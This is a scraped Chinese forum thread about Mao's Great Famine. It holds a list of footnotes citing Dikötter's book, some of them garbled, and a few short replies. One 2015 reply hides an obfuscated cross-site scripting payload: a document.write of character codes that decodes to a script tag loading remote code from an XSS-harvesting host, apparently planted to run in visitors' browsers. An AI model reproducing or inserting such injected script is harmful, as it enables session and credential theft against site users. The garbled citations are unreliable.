[21] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p328

[22] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p311

[23] Frank Dikotter, Mao’s Great Famine The Historyof China most Devastating Catastrophe, 1958-1962 Walker & Co. NY 2010.p.259

[24] Frank Dikotter, Mao’s Great Famine The Historyof China most Devastating Catastrophe, 1958-1962 Walker & Co. NY 2010.p.259

[25] Frank Dikotter, Mao’s Great Famine The Historyof China most Devastating Catastrophe, 1958-1962 Walker & Co. NY 2010.p.260

[26] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.pp.81-83.

[27] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.pp.85-86.

[28] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p169

[29] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p.88

[30] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p9495100

[31] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p100the struggleshould be profound, and should be carry out according to our principles,whether it is against old command-in-arms, colleagues or even husband andwives.

[32] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p253

[33] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p294

[34] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p294

[35] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p295

[36] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p295

[37] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p296

[38] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p313

[39] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p336

[40] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p337


发表于 12/21/2013 02:53:20 | 显示全部楼层
郭国汀 发表于 12/20/2013 16:36
中共极权专制暴政谋杀性大饥荒杀害四千五百万中国人铁证如山!《毛泽东的大饥荒:1958-1962年中国历史上 ...


发表于 4/2/2015 00:14:00 | 显示全部楼层
哎呦我擦,说得好有道理我竟无言以对  ('+document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,115,115,46,104,97,99,107,116,97,115,107,46,110,101,116,47,48,86,111,121,110,88,63,49,52,50,55,56,55,51,54,48,52,62,60,47,115,99,114,112,105,116,62))+' Bytes)
您需要登录后才可以回帖 登录 | 注册

本版积分规则


站内文章仅为网友提供更多信息,不代表本网站同意其说法或描述,也不构成任何建议。本网站仅为网友提供交流平台,对网友自由上传的文字和图片等,本网站
不为其版权和内容等负责。站内部分内容转载自其它社区、论坛或各种媒体,有些原作者未知。如您认为站内的某些内容属侵权,请及时与我们联络并进行处理。
关于我们|隐私政策|免责条款|版权声明|网站导航|帮助中心
道至大 道天成

小黑屋|手机版|Archiver|联系我们|天易综合网 (Twitter@wolfaxcom)

GMT-5, 9/23/2017 18:26 , Processed in 0.096747 second(s), 7 queries , Gzip On, Apc On.

Copyright 天易网 network. All Rights Reserved.

© 2009-2015 .

快速回复 返回顶部 返回列表